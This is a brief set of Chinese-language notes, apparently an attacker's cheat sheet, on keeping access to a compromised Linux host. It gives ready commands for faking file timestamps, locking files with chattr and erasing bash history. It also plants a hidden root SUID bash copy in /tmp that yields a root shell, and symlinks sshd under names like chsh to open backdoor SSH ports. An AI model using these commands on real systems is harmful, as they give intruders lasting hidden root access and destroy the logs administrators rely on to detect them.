1、文件建立日期更改:touch -r 已存在文件 新增文件
使用效果:新增文件日期更改为与已存在文件创建日期一致
2、文件锁定
添加锁定:chattr +i 文件
解除锁定:chattr -i 文件
查看文件状态:lsattr
3、隐藏历史命令
set +o history #不记录命令
history -d 命令序号 #删除为该序号的记录
set -o history #重新开始记录命令
sed -i ‘1,200d’ .bash_history #删除序号为1至200的命令记录
当⼀个⽂件所属主的x标志位s(set uid简称suid)时,且所属主为root时,当执⾏该⽂件时,其实是以root身份执⾏的。
1、SUID权限仅对⼆进制程序有效。
2、执⾏者对于该程序需要具有x的可执⾏权限
3、本权限仅在执⾏该程序的过程中有效
4、在执⾏过程中执⾏者将具有该程序拥有者的权限
使用root权限创建一个属主为root的suid文件:
$cp /bin/bash /tmp/.mybash
$chmod 4755 /tmp/.mybash
使用普通用户运行
/tmp/.mybash -p
获得root权限shell
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsh -oPort=23333
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=23334
ln -sf /usr/sbin/sshd /tmp/runuser;/tmp/runuser -oPort=23335